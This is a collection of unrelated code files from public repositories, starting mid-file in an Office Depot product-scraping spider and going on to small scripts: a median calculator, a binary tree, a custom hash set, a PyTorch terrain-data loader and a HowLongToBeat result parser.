self.user_agent)\n profile.set_preference(\"network.proxy.type\", 1) # manual proxy configuration\n if self.proxy:\n if 'socks' in self.proxy_type:\n profile.set_preference(\"network.proxy.socks\", self.proxy.split(':')[0])\n profile.set_preference(\"network.proxy.socks_port\", int(self.proxy.split(':')[1]))\n else:\n profile.set_preference(\"network.proxy.http\", self.proxy.split(':')[0])\n profile.set_preference(\"network.proxy.http_port\", int(self.proxy.split(':')[1]))\n profile.update_preferences()\n driver = webdriver.Firefox(profile)\n return driver\n\n def _parse_single_product(self, response):\n return self.parse_product(response)\n\n @staticmethod\n def _get_product_id(url):\n match = re.search(r'/products/(\d{2,20})/', url)\n if match:\n return match.group(1)\n\n def parse_product(self, response):\n meta = response.meta\n product = meta.get('product', SiteProductItem())\n reqs = []\n meta['reqs'] = reqs\n\n product['_subitem'] = True\n\n # Parse locale\n locale = 'en_US'\n 
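# The locale is hard-coded: officedepot.com is treated as a US-only (en_US) site here.\n 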
cond_set_value(product, 'locale', locale)\n\n # Parse title\n title = self.parse_title(response)\n cond_set(product, 'title', title, conv=string.strip)\n\n # Parse image\n image = self.parse_image(response)\n cond_set(product, 'image_url', image)\n\n # Parse brand\n brand = self.parse_brand(response)\n cond_set_value(product, 'brand', brand)\n\n # Parse sku\n sku = self.parse_sku(response)\n cond_set_value(product, 'sku', sku)\n\n # Parse description\n description = self.parse_description(response)\n cond_set_value(product, 'description', description)\n\n # Parse price\n price = self.parse_price(response)\n cond_set_value(product, 'price', price)\n\n # Parse model\n model = self._parse_model(response)\n cond_set_value(product, 'model', model)\n\n # Parse reseller_id\n reseller_id = self.parse_reseller_id(response)\n cond_set_value(product, \"reseller_id\", reseller_id)\n\n # Parse is out of stock\n oos = self._parse_is_out_of_stock(response)\n cond_set_value(product, 'is_out_of_stock', oos)\n\n # Parse categories and category\n categories = self._parse_categories(response)\n cond_set_value(product, 'categories', categories)\n if categories:\n cond_set_value(product, 'category', categories[-1])\n\n # Parse related products\n related_product = self._parse_related_product(response)\n cond_set_value(product, 'related_products', related_product)\n\n br_count = is_empty(re.findall(r'(\\d+)<\\/span>',\n response.body_as_unicode()))\n meta['_br_count'] = br_count\n meta['product'] = product\n\n reqs.append(Request(\n url=self.REVIEW_URL.format(product_id=self._get_product_id(\n response.url)),\n dont_filter=True,\n callback=self.parse_buyer_reviews,\n meta=meta\n ))\n\n sku = is_empty(response.xpath('//input[@name=\"id\"]/@value').extract())\n name = is_empty(response.xpath(\n '//h1[@itemprop=\"name\"]/text()').re('(.*?),'))\n\n if sku and name and self.scrape_variants_with_extra_requests:\n name = urllib.quote_plus(name.strip().encode('utf-8'))\n reqs.append(Request(url=self.VARIANTS_URL.format(name=name,\n sku=sku),\n callback=self._parse_variants,\n meta=meta))\n # parse questions & answers\n reqs.append(Request(\n url=self.QA_URL.format(product_id=self._get_product_id(\n response.url)),\n callback=self._parse_questions,\n meta=meta,\n dont_filter=True\n ))\n\n if reqs:\n return self.send_next_request(reqs, response)\n return product\n\n def parse_reseller_id(self, response):\n regex = \"\\/(\\d+)\"\n reseller_id = re.findall(regex, response.url)\n reseller_id = reseller_id[0] if reseller_id else None\n return reseller_id\n\n def _parse_questions(self, response):\n meta = response.meta\n reqs = response.meta['reqs']\n product = response.meta['product']\n qa = []\n questions_ids_regex = \"\"\"BVQAQuestionSummary.+?javascript:void.+?>([^<]+)[^\"']+[\"']BVQAQuestionMain(\\d+)(?:.+?BVQAQuestionDetails.+?div>([^<]+)?).+?BVQAElapsedTime.+?>([^<]+)\"\"\"\n questions_ids = re.findall(questions_ids_regex, response.body_as_unicode())\n for (question_summary, question_id, question_details, question_date) in questions_ids:\n # Convert date format\n if question_date:\n try:\n from dateutil.relativedelta import relativedelta\n years = re.findall(\"(\\d+?)\\s+?years\", question_date)\n years = years[0] if years else '0'\n years = int(years) if years.isdigit() else '0'\n months = re.findall(\"(\\d+?)\\s+?months\", question_date)\n months = months[0] if months else '0'\n months = int(months) if months.isdigit() else '0'\n if not months and not years:\n converted_date = None\n else:\n converted_date = 
datetime.now() - relativedelta(years=years, months=months)\n converted_date = converted_date.strftime(\"%Y-%m-%d\")\n except Exception as e:\n converted_date = None\n self.log('Failed to parse date, setting date to None {}'.format(e))\n else:\n converted_date = None\n # regex to get part of response that contain all answers to question with given id\n text_r = \"BVQAQuestion{}Answers(.+?)BVQAQuestionDivider\".format(question_id)\n all_a_text = re.findall(text_r, response.body_as_unicode())\n all_a_text = ''.join(all_a_text[0]) if all_a_text else ''\n answers_regex = r\"Answer:.+?>([^<]+)\"\n answers = re.findall(answers_regex, all_a_text)\n answers = [{'answerText':a} for a in answers]\n question = {\n 'questionDate': converted_date,\n 'questionId': question_id,\n 'questionDetail': question_details.strip() if question_details else '',\n 'questionSummary': question_summary.strip() if question_summary else '',\n 'answers': answers,\n 'totalAnswersCount': len(answers)\n }\n qa.append(question)\n product['all_questions'] = qa\n if reqs:\n return self.send_next_request(reqs, response)\n return product\n\n def clear_text(self, str_result):\n return str_result.replace(\"\\t\", \"\").replace(\"\\n\", \"\").replace(\"\\r\", \"\").replace(u'\\xa0', ' ').strip()\n\n def _parse_is_out_of_stock(self, response):\n oos = response.xpath(\n '//*[@itemprop=\"availability\"'\n ' and @content=\"http://schema.org/OutOfStock\"]')\n return bool(oos)\n\n def _parse_model(self, response):\n model = response.xpath(\n '//*[@id=\"attributemodel_namekey\"]/text()').extract()\n if model:\n return model[0].strip()\n\n def _parse_categories(self, response):\n categories = response.xpath(\n '//*[@id=\"siteBreadcrumb\"]//'\n 'span[@itemprop=\"name\"]/text()').extract()\n return categories\n\n def _parse_related_product(self, response):\n results = []\n base_url = response.url\n for related_product in response.xpath(\n '//*[@id=\"relatedItems\"]'\n '//tr[contains(@class,\"hproduct\")]'\n '/td[@class=\"description\"]/a'):\n name = is_empty(related_product.xpath('text()').extract())\n url = is_empty(related_product.xpath('@href').extract())\n if name and url:\n results.append(RelatedProduct(title=name,\n url=urlparse.urljoin(base_url,\n url)))\n return results\n\n def _parse_variants(self, response):\n \"\"\"\n Parses product variants.\n \"\"\"\n reqs = response.meta['reqs']\n product = response.meta['product']\n data = json.loads(response.body)\n variants = []\n\n if data.get('success'):\n for sku in data.get('skus', []):\n vr = {}\n vr['url'] = urlparse.urljoin(response.url, sku.get('url'))\n vr['skuId'] = sku.get('sku')\n price = is_empty(re.findall(\n '\$([\d\.]+)', sku.get('attributesDescription', '')))\n if price:\n vr['price'] = price\n\n name = sku.get('description', '')\n if name:\n vr['properties'] = {'title': name}\n\n vr['image_url'] = sku.get('thumbnailImageUrl').split('?')[0]\n variants.append(vr)\n\n product['variants'] = variants\n if product.get('variants') and self._extra_requests:\n variants_urls = [p.get('url') for p in product['variants']]\n for var_url in variants_urls:\n req = Request(url=var_url, callback=self._parse_in_stock_for_variants)\n req.meta['product'] = product\n reqs.append(req)\n if reqs:\n return self.send_next_request(reqs, response)\n\n return product\n\n # parse variants one by one and set out of stock status for each variant\n def _parse_in_stock_for_variants(self, response):\n reqs = response.meta['reqs']\n product = response.meta['product']\n oos = 
self._parse_is_out_of_stock(response)\n for variant in product['variants']:\n if variant['url'] == response.url:\n variant['in_stock'] = not oos\n break\n if reqs:\n return self.send_next_request(reqs, response)\n return product\n\n def parse_buyer_reviews(self, response):\n meta = response.meta.copy()\n reqs = meta['reqs']\n\n self.br.br_count = meta['_br_count']\n buyer_reviews_per_page = self.br.parse_buyer_reviews_per_page(response)\n\n product = response.meta['product']\n product['buyer_reviews'] = BuyerReviews(**buyer_reviews_per_page)\n\n if reqs:\n return self.send_next_request(reqs, response)\n\n return product\n\n def send_next_request(self, reqs, response):\n \"\"\"\n Helps to handle several requests\n \"\"\"\n req = reqs.pop(0)\n new_meta = response.meta.copy()\n if reqs:\n new_meta[\"reqs\"] = reqs\n\n return req.replace(meta=new_meta)\n\n def parse_brand(self, response):\n brand = is_empty(response.xpath(\n '//td[@itemprop=\"brand\"]/@content').extract())\n if not brand:\n brand = is_empty(response.xpath(\n '//td[@itemprop=\"brand\"]/text()').extract())\n if brand:\n brand = brand.strip()\n return brand\n\n def parse_title(self, response):\n title = response.xpath(\n '//h1[contains(@itemprop, \"name\")]/text()').extract()\n return title\n\n def parse_data(self, response):\n data = re.findall(r'var MasterTmsUdo \\'(.+)\\'; ', response.body_as_unicode())\n if data:\n data = re.sub(r'\\\\(.)', r'\\g<1>', data[0])\n try:\n js_data = json.loads(data)\n except:\n return\n return js_data\n\n def parse_image(self, response):\n img = response.xpath('//img[contains(@id, \"mainSkuProductImage\")]/@src').extract()\n return img\n\n def parse_description(self, response):\n description = response.xpath('//div[contains(@class, \"sku_desc\")]').extract()\n if description:\n return self.clear_text(description[0])\n else:\n return ''\n\n def parse_sku(self, response):\n sku = response.xpath('//td[contains(@id, \"basicInfoManufacturerSku\")]/text()').extract()\n # sku = response.xpath('//div[contains(@id, \"skuValue\")]/text()').extract()\n if sku:\n return self.clear_text(sku[0])\n\n def parse_price(self, response):\n\n price = response.xpath('//meta[contains(@itemprop, \"price\")]/@content').extract()\n currency = response.xpath('//meta[contains(@itemprop, \"priceCurrency\")]/@content').extract()\n\n if price and currency:\n price = Price(price=price[0], priceCurrency=currency[0])\n else:\n price = Price(price=0.00, priceCurrency=\"USD\")\n\n return price\n\n def parse_paginate_link(self, response, nao):\n check_page = '&No=%s' % nao\n for link in response.xpath(\n '//a[contains(@class, \"paging\")]/@href'\n ).extract():\n if check_page in link:\n u = urlparse.urlparse(link)\n return urlparse.urljoin('http://www.officedepot.com', u.path)\n\n def parse_category_link(self, response):\n categories_links = []\n for link in response.xpath(\n '//div[contains(@class, \"category_wrapper\")]/a[contains(@class, \"link\")]/@href'\n ).extract():\n categories_links.append(link)\n\n def _scrape_total_matches(self, response):\n totals = response.xpath('//div[contains(@id, \"resultCnt\")]/text()').extract()\n if totals:\n totals = totals[0].replace(',', '').replace('.', '').strip()\n if totals.isdigit():\n if not self.TOTAL_MATCHES:\n self.TOTAL_MATCHES = int(totals)\n return int(totals)\n\n def _scrape_product_links(self, response):\n items = response.xpath(\n '//div[contains(@class, \"descriptionFull\")]/'\n 'a[contains(@class, \"med_txt\")]/@href'\n ).extract() or response.css('.desc_text 
a::attr(\"href\")').extract()\n # Scraper was redirected to product page instead of search results page\n if not items and \"officedepot.com/a/products\" in response.url:\n prod = SiteProductItem(search_redirected_to_product=True)\n # TODO we may not need any data for product aside from \"search_redirected_to_product\" flag.\n # Rework if that's the case - CON-28287\n req = Request(response.url, callback=self.parse_product, dont_filter=True)\n req.meta[\"remaining\"] = 0\n req.meta['product'] = prod\n yield req, prod\n else:\n for link in items:\n yield link, SiteProductItem()\n\n def _get_nao(self, url):\n nao = re.search(r'nao=(\\d+)', url)\n if not nao:\n return\n return int(nao.group(1))\n\n def _replace_nao(self, url, new_nao):\n current_nao = self._get_nao(url)\n if current_nao:\n return re.sub(r'nao=\\d+', 'nao='+str(new_nao), url)\n else:\n return url+'&nao='+str(new_nao)\n\n def _scrape_next_results_page_link(self, response):\n if self.TOTAL_MATCHES is None:\n self.log('No \"next result page\" link!')\n # # TODO: check result by categories\n # return self.parse_category_link(response)\n return\n #if self.CURRENT_NAO > self.TOTAL_MATCHES+self.PAGINATE_BY:\n # return # all the products have been collected\n if self.CURRENT_NAO > self.quantity+self.PAGINATE_BY:\n return # num_products > quantity\n self.CURRENT_NAO += self.PAGINATE_BY\n if '/a/browse/' in response.url: # paginate in category or subcategory\n new_paginate_url = self.parse_paginate_link(response, self.CURRENT_NAO)\n if new_paginate_url:\n return Request(new_paginate_url, callback=self.parse, meta=response.meta,\n cookies=self.selenium_cookies)\n return Request(\n self.PAGINATE_URL.format(\n search_term=response.meta['search_term'],\n nao=str(self.CURRENT_NAO)),\n callback=self.parse, meta=response.meta,\n cookies=self.selenium_cookies\n )\n","repo_name":"lifelonglearner127/tmtext","sub_path":"product-ranking/product_ranking/spiders/officedepot.py","file_name":"officedepot.py","file_ext":"py","file_size_in_byte":22480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24555895488","text":"'''\nimport MySQLdb\n\n# 连接到数据库\nconn = MySQLdb.connect(\n host=\"localhost\",\n user=\"papupupu\",\n password=\"123456\",\n db=\"test\"\n)\n\n# 创建一个游标对象\ncursor = conn.cursor()\n\n# 构建 SQL 插入语句\ndata = {\"name\": \"John\", \"age\": 30, \"gender\": \"male\", \"height\": 180}\nkeys = [\"name\", \"age\", \"gender\"]\nvalues = [data[k] for k in keys]\nsql = \"INSERT INTO my_table ({}) VALUES ({})\".format(\n \",\".join(keys),\n \",\".join([\"%s\"] * len(values))\n)\n\n# 执行 SQL 插入语句\ncursor.execute(sql, values)\n\n# 提交更改\nconn.commit()\n\n# 关闭游标和数据库连接\ncursor.close()\nconn.close()\n'''\nimport re\n\nmy_string = str(\"This is a \\\\r\\\\nmulti-line string.\")\nmy_string = re.sub(r\"\\\\r\\\\n\", \"\", my_string)\nprint(my_string)\nprint(\"end\")\n","repo_name":"papupupu/mynote","sub_path":"linux网络编程资料/day5/4-源代码/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14710581567","text":"\"\"\"\nTop level script.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom lib.data_loader import master\n\nif __name__ == \"__main__\":\n df = master()\n\n # Visualize using Seaborn and Matplotlib\n sns.set(style=\"whitegrid\")\n\n # Scatter plot\n plt.figure(figsize=(10, 6))\n sns.scatterplot(data=df.to_pandas(), x=\"literacy_rate\", y=\"gdp_pc\")\n 
plt.title(\"Scatter Plot of Litercy vs. GDP Per Capita\")\n plt.xlabel(\"Literacy Rate\")\n plt.ylabel(\"GDP Per Capita\")\n plt.savefig(\"outputs/Scatterplot.png\")\n\n # descriptive stats\n df.describe().write_csv(\"outputs/descriptive_stats.csv\")\n","repo_name":"nogibjj/IDS706-miniproject-week-3","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24606930036","text":"'''Median\nThe Median is the middle value among all the values in sorted order. Here we need to calculate the mid-value of all the values in a dataset. But before calculating the Median, we need to arrange all the values in sorted order. There are two different ways of calculating the median value:\n\nwhen the total number of values is even: Median = [(n/2)th term + {(n/2)+1}th]/2\nwhen the total number of values is odd: Median = {(n+1)/2}thterm\nNow below is how you can calculate the median using Python: '''\n\n# Median\n\nlist1 = [12, 16, 20, 20, 12, 30, 25, 23, 24, 20]\nlist1.sort()\n\nif len(list1) % 2 == 0:\n m1 = list1[len(list1)//2]\n m2 = list1[len(list1)//2 - 1]\n median = (m1 + m2)/2\nelse:\n median = list1[len(list1)//2]\nprint(median)","repo_name":"steepenraj15/basic-python-code","sub_path":"Project/Calculating Median.py","file_name":"Calculating Median.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10097659152","text":"a = {'Bob': 102, 'Ada': 201, 'Alice': 103, 'Tim': 50}\n\ndef max_dico(dico): \n name = \"\"\n like_max = 0\n for i in dico.items():\n if i[1] > like_max:\n like_max = i[1]\n name = i[0]\n return (name, like_max)\n\n\n\nprint(max_dico(a))\n\nprint(max_dico({'Alan': 222, 'Ada': 201, 'Eve': 220, 'Tim': 50}))","repo_name":"HSleymn/Solution-types-bac-pratique-2023","sub_path":"08/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1012028203","text":"__author__ = \"Fernando Andrade\"\n__copyright__ = \"Copyright 2020\"\n\n#Representação de Nodo em python\nclass NodoArvore:\n\tdef __init__(self, chave=None, esquerda=None, direita=None):\n\t\tself.chave = chave\n\t\tself.esquerda = esquerda\n\t\tself.direita = direita\n\n\tdef __repr__(self):\n\t\treturn '%s <- %s -> %s' % (self.esquerda and self.esquerda.chave,\n\t\t\t\t\t\t\t\t\tself.chave,\n\t\t\t\t\t\t\t\t\tself.direita and self.direita.chave)\n\ndef em_ordem(raiz):\n\tif not raiz:\n\t\treturn\n\n\tem_ordem(raiz.esquerda)\n\tprint(raiz.chave)\n\tem_ordem(raiz.direita)\n\n\nraiz = NodoArvore(40)\n\nraiz.esquerda = NodoArvore(20)\nraiz.direita = NodoArvore(60)\n\nraiz.direita.esquerda = NodoArvore(50)\nraiz.direita.direita = NodoArvore(70)\nraiz.esquerda.esquerda = NodoArvore(10)\nraiz.esquerda.direita = NodoArvore(30)\n\n#A representação do output é que no meio é o nodo pai, enquanto o da esquerda e direita\n#São os filhos.\n\nprint(\"Árvore: \",raiz)\n\n#Nodo corrente\nem_ordem(raiz)","repo_name":"fernanduandrade/logic-studies","sub_path":"Tree_Node/Tree_Node.py","file_name":"Tree_Node.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70769342937","text":"# def find_all_indices(values, value):\n# idx = 0\n# indices = []\n# while True:\n# try:\n# new_idx = 
values.index(value, idx)\n# indices.append(new_idx)\n# idx = new_idx + 1\n# except ValueError:\n# break\n#\n# return indices\n#\n#\n# print(find_all_indices([1, 2, 3, 4, 2, 1, 3, 1, 5], 1))\n#\n# tt = (1, 2, 3)\n# a, *rest = tt\n# print(a, rest)\n\n\nclass CustomSet:\n resize_factor = 0.7\n\n def __init__(self):\n self.count = 0\n self.capacity = 8\n self.values = [None] * self.capacity\n\n def execute_resize_check(self):\n return self.capacity * self.resize_factor <= self.count\n\n def resize(self):\n self.count = 0\n old_values = self.values\n self.capacity *= 2\n self.values = [None] * self.capacity\n for nested_lists in old_values:\n if nested_lists:\n for value in nested_lists:\n self.add(value)\n\n def get_index(self, value):\n return abs(hash(value)) % self.capacity\n\n def add(self, value):\n index = self.get_index(value)\n if self.values[index] is None:\n self.values[index] = []\n if value not in self.values[index]:\n self.values[index].append(value)\n self.count += 1\n if self.execute_resize_check():\n self.resize()\n\n def remove(self, value):\n if not self.contains(value):\n return\n index = self.get_index(value)\n self.values[index].remove(value)\n self.count -= 1\n\n def contains(self, value):\n index = self.get_index(value)\n if not self.values[index]:\n return False\n if value not in self.values[index]:\n return False\n return True\n\n def __contains__(self, item):\n return self.contains(item)\n\n def __len__(self):\n return self.count\n\n\n\nss = CustomSet()\n# ss.add('abc')\n#\nvalues = ['a',\n 1,\n 0,\n -1,\n (2, 3, 4),\n 3.14,\n 'Pesho',\n 'detail',\n 'glass',\n 'wood',\n 54,\n 'pepper',\n 'door',\n 'handle',\n None,\n 'phone',\n 'rocket',\n 12234,\n 'chess',\n -67.876,\n ]\n\nfor x in values:\n ss.add(x)\n\n# print(ss.values)\n# print(len(values))\n# print(len(ss.values))\n# count = 0\n# for value in ss.values:\n# if value:\n# count += 1\n# print(count)\n# print(ss.contains('Pesho'))\n# ss.remove('Pesho')\n# print(ss.values)\n# print(ss.contains('Pesho'))\n# print(54 in ss)\n# ss.remove(54)\n# print(54 in ss)\nprint(54 in ss)\nprint(len(ss))\nprint(type(ss))\nprint(ss)","repo_name":"StanDobrev11/Python_Advanced","sub_path":"03_Tuples_and_Sets_-_Lab/00_various_fm_lecture.py","file_name":"00_various_fm_lecture.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29221291603","text":"import numpy as np\nfrom classification.helpers.distances import cosine_sim, euclidean_dist\nfrom classification.base import BaseClassifier\n\n\nclass CosineClassifier(BaseClassifier):\n\n def __init__(self, data):\n BaseClassifier.__init__(self, data)\n\n def classify(self, x):\n sum = 0\n for d in self.data:\n sum += d['y'] * cosine_sim(x, d['x'])\n conf = np.abs(sum / len(self.data))\n return np.sign(sum), conf\n\n\nclass DistanceClassifier(BaseClassifier):\n\n def __init__(self, data, norm=True):\n BaseClassifier.__init__(self, data)\n self.norm = norm\n\n def classify(self, x):\n sum = 0\n for d in self.data:\n sum += d['y'] * (1 - 1 / 4 * pow(euclidean_dist(x,\n d['x'], norm=self.norm), 2))\n conf = np.abs(sum / len(self.data))\n return np.sign(sum), conf\n\n\nclass KNNCosineSquaredClassifier(BaseClassifier):\n\n def __init__(self, data, k=1):\n BaseClassifier.__init__(self, data)\n self.k = k\n\n def classify(self, x):\n ratings = []\n for d in self.data:\n r = pow(cosine_sim(x, d['x']), 2)\n ratings.append((r, d['y']))\n top_k = sorted(ratings, key=lambda t: t[0], 
reverse=True)[:self.k]\n top_classes = [t[1] for t in top_k]\n val, cnt = np.unique(top_classes, return_counts=True)\n counts = dict(zip(val, cnt))\n top_class = val[0]\n top_count = cnt[0]\n for i in reversed(range(self.k)):\n c = top_classes[i]\n if counts[c] >= top_count:\n top_count = counts[c]\n top_class = c\n conf = top_count / self.k\n return top_class, conf\n","repo_name":"emiliantolo/ensembles-quantum-classifiers","sub_path":"classification/classifiers/classical.py","file_name":"classical.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33711859190","text":"import pandas as pd\nimport numpy as np\nimport os\n\nfrom collections import Counter\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.sampler import WeightedRandomSampler\n\n# train_data_root = \"./data/train_data.csv\"\ntrain_data_root = \"terrain-identification/data/train_data.csv\"\n\nSUBJECT_X_TEMPLATE = \"subject_{}_{}__x.csv\"\nSUBJECT_X_TIME_TEMPLATE = \"subject_{}_{}__x_time.csv\"\nSUBJECT_Y_TEMPLATE = \"subject_{}_{}__y.csv\"\nSUBJECT_Y_TIME_TEMPLATE = \"subject_{}_{}__y_time.csv\"\n\nX_HEADER = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyro_x\", \"gyro_y\", \"gyro_z\"]\nY_HEADER = [\"label\"]\n\nBATCH_SIZE = 128\n\ndef parse_uid(uid):\n subject_id, session_num = uid.split(\"_\")\n # return int(subject_id), int(session_num)\n return subject_id, session_num\n\nclass SubjectDataset(Dataset):\n\n def __init__(self, datapath: str, ids: list):\n \n self.ids = ids\n self.datapath = datapath\n self.y_files = {uid: os.path.join(self.datapath, SUBJECT_Y_TEMPLATE.format(parse_uid(uid)[0], parse_uid(uid)[1])) for uid in self.ids}\n self.x_files = {uid: os.path.join(self.datapath, SUBJECT_X_TEMPLATE.format(parse_uid(uid)[0], parse_uid(uid)[1])) for uid in self.ids}\n \n # Generate a list of samples and determine the number of datapoints in the dataset \n # and build up the cache\n self.build_cache_and_datalen()\n\n def __len__(self):\n return self.num_samples\n\n def __getitem__(self, index):\n \n inputs = self.X[index]\n labels = np.array([self.y[index]])\n\n return torch.from_numpy(inputs), torch.from_numpy(labels)\n\n def build_cache_and_datalen(self):\n\n num_samples = 0\n timesteps = None\n\n X_list = []\n y_list = []\n\n for uid, y_file in self.y_files.items():\n # print(f\"Converting uid {uid}\")\n y = pd.read_csv(y_file)\n n_samples = len(y)\n num_samples += n_samples\n\n x_file = self.x_files[uid]\n X_dataframe = pd.read_csv(x_file)\n if timesteps is None:\n _sample = X_dataframe[X_dataframe[\"timestamp\"] == 0]\n timesteps = len(_sample)\n\n # Convert to numpy\n X = self.dataframe_to_numpy(X_dataframe, timesteps, y)\n\n X_list.append(X)\n y_list.append(y[\"label\"].values)\n\n self.X = np.concatenate(X_list, axis=0).astype(np.float32)\n self.y = np.concatenate(y_list, axis=0).astype(int)\n assert self.X.shape[0] == self.y.shape[0]\n \n self.num_samples = self.X.shape[0]\n\n def dataframe_to_numpy(self, df, timesteps, y_df):\n \"\"\"Convert from pandas to numpy for faster access\n \"\"\"\n len_array = int(len(df) / timesteps)\n assert len_array == len(y_df)\n\n values = df[X_HEADER].values\n X = values.reshape(len_array, timesteps, len(X_HEADER))\n \n return np.transpose(X, axes=(0, 2, 1)).copy()\n\nsplit_ids = {'train': ['005_02',\n '001_06',\n '003_02',\n '001_05',\n 
'002_02',\n '003_01',\n '003_03',\n '005_01',\n '001_07',\n '002_05',\n '004_02',\n '002_03',\n '001_02',\n '002_04',\n '001_03',\n '004_01',\n '005_03',\n '006_01',\n '006_02',\n '007_01',\n '007_03',\n '007_04',\n \n ],\n 'val': ['001_08', '002_01', '001_01', '001_04', '006_03','007_02','008_01'],\n}\ntrain_data_path = 'terrain-identification/data/TrainingData/filtered_window_1'\ntrain_dataset = SubjectDataset(\n train_data_path, \n split_ids[\"train\"]\n)\nys = train_dataset.y.tolist()\ncounts = Counter(ys)\nweights = np.array([1./counts[_y] for _y in ys])\nsample_weights = torch.from_numpy(weights).float()\nsampler = WeightedRandomSampler(\n weights=sample_weights,\n num_samples=len(sample_weights),\n replacement=True)\ntrain_dataloader = DataLoader(train_dataset, batch_size=BATCH_SIZE, sampler=sampler, drop_last=True)\ntrain_iterations = (len(train_dataset) // BATCH_SIZE) + ((len(train_dataset) % BATCH_SIZE) != 0)\n\nval_dataset = SubjectDataset(\n train_data_path, \n split_ids[\"val\"]\n)\nval_dataloader = DataLoader(val_dataset, batch_size=BATCH_SIZE, shuffle=True, drop_last=True)\nval_iterations = (len(val_dataset) // BATCH_SIZE) + ((len(val_dataset) % BATCH_SIZE) != 0)\n","repo_name":"Darth-Kronos/terrain-identification","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22257510941","text":"# ---------------------------------------------------------------------\n# IMPORTS\n\nimport json\nimport re\nfrom .HowLongToBeatEntry import HowLongToBeatEntry\nfrom difflib import SequenceMatcher\n\n# ---------------------------------------------------------------------\n\n\nclass JSONResultParser:\n \"\"\"\n This class parses the JSON code received from HowLongToBeat\n \"\"\"\n\n # Used for both images and game links\n IMAGE_URL_PREFIX = \"https://howlongtobeat.com/games/\"\n GAME_URL_PREFIX = \"https://howlongtobeat.com/game/\"\n\n def __init__(self, input_game_name: str, input_game_url: str,\n input_minimum_similarity: float, input_game_id: int = None,\n input_similarity_case_sensitive: bool = True):\n # Init instance variables\n self.results = []\n self.minimum_similarity = input_minimum_similarity\n self.similarity_case_sensitive = input_similarity_case_sensitive\n self.game_id = input_game_id\n self.base_game_url = input_game_url\n # Init object\n self.game_name = input_game_name\n self.game_name_numbers = []\n for word in input_game_name.split(\" \"):\n if word.isdigit():\n self.game_name_numbers.append(word)\n\n def parse_json_result(self, input_json_result):\n response_result = json.loads(input_json_result)\n for game in response_result[\"data\"]:\n new_game_entry = self.parse_json_element(game)\n # We have a game_id, so we are searching by id, add it only if the id is equal\n if self.game_id is not None and str(new_game_entry.game_id) != str(self.game_id):\n continue\n # Minimum Similarity is 0 so just add it straight away\n elif self.minimum_similarity == 0.0:\n self.results.append(new_game_entry)\n # Add it if it respects the minimum similarity\n elif new_game_entry.similarity >= self.minimum_similarity:\n self.results.append(new_game_entry)\n\n def parse_json_element(self, input_game_element):\n current_entry = HowLongToBeatEntry()\n # Compute base fields\n current_entry.game_id = input_game_element[\"game_id\"]\n current_entry.game_name = input_game_element[\"game_name\"]\n current_entry.game_alias = 
input_game_element[\"game_alias\"]\n current_entry.game_type = input_game_element[\"game_type\"]\n current_entry.game_image_url = self.IMAGE_URL_PREFIX + input_game_element[\"game_image\"]\n current_entry.game_web_link = self.GAME_URL_PREFIX + str(current_entry.game_id)\n current_entry.review_score = input_game_element[\"review_score\"]\n current_entry.profile_dev = input_game_element[\"profile_dev\"]\n current_entry.profile_platforms = input_game_element[\"profile_platform\"].split(\", \")\n current_entry.release_world = input_game_element[\"release_world\"]\n # Add full JSON content to the entry\n current_entry.json_content = input_game_element\n # Add a few times elements as help for the user\n current_entry.main_story = round(input_game_element[\"comp_main\"] / 3600, 2)\n current_entry.main_extra = round(input_game_element[\"comp_plus\"] / 3600, 2)\n current_entry.completionist = round(input_game_element[\"comp_100\"] / 3600, 2)\n current_entry.all_styles = round(input_game_element[\"comp_all\"] / 3600, 2)\n # Compute Similarity\n game_name_similarity = self.similar(self.game_name, current_entry.game_name,\n self.game_name_numbers, self.similarity_case_sensitive)\n game_alias_similarity = self.similar(self.game_name, current_entry.game_alias,\n self.game_name_numbers, self.similarity_case_sensitive)\n current_entry.similarity = max(game_name_similarity, game_alias_similarity)\n # Return it\n return current_entry\n\n @staticmethod\n def similar(a, b, game_name_numbers, similarity_case_sensitive):\n \"\"\"\n This function calculate how much the first string is similar to the second string\n @param a: First String\n @param b: Second String\n @param game_name_numbers: All the numbers in string, used for an additional check\n @param similarity_case_sensitive: If the SequenceMatcher() should be case-sensitive (true) or ignore case (false)\n @return: Return the similarity between the two string (0.0-1.0)\n \"\"\"\n if a is None or b is None:\n return 0\n # Check if we want a case-sensitive compare or not\n if similarity_case_sensitive:\n similarity = SequenceMatcher(None, a, b).ratio()\n else:\n similarity = SequenceMatcher(None, a.lower(), b.lower()).ratio()\n if game_name_numbers is not None and len(game_name_numbers) > 0: # additional check about numbers in the string\n number_found = False\n cleaned = re.sub(r'([^\\s\\w]|_)+', '', b)\n for word in cleaned.split(\" \"): # check for every word\n if word.isdigit(): # if is a digit\n for number_entry in game_name_numbers: # compare it with numbers in the begin string\n if str(number_entry) == str(word):\n number_found = True\n break\n if not number_found: # number in the given string not in this one, reduce prob\n similarity -= 0.1\n return 